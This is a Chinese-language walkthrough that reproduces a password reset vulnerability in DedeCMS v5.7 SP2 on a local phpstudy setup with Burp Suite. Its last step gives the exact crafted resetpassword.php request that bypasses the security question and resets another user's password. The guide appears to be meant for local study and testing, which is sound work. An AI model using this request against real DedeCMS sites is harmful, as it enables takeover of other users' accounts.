DeDeCMS v5.7 SP2 正式版前台任意用户密码修改漏洞复现
一.搭建网站
1.下载hpstudy并打开
2.下载DedeCMS V5.7 SP2正式版
3.解压dedecms后,把upload下的所有文件复制到phpstudy网站目录下,phpstudy默认网站目录为,D://phpstudy_pro/WWW
4.启动phpstudy环境中的apache与mysql
5.访问 http://127.0.0.1/install/index.php,并安装好dedecm
6.注册测试账户 test,并不设置安全问题
二.安装Burpsuite
1.安装jdk-8u201-windows-x64
2.配置java环境变量
右键“我的电脑”—“属性”—“高级系统配置”
3.我们需要新建两个环境变量,修改一个环境变量
(1)JAVA_HOME
变量值填写JAVA安装的路径,我的是C:\Program Files\Java\jdk1.8.0_201
(2)CLASSPATH、
变量值填写 .;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar
(3)修改Path变量
(如果是Win7)在其变量值的后面加上
;%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin
3.安装Burpsuite
三.为浏览器配置代理
四.用burp抓包
1.member后的内容改为resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2
直接访问该链接,修改新密码
成功修改登陆该账号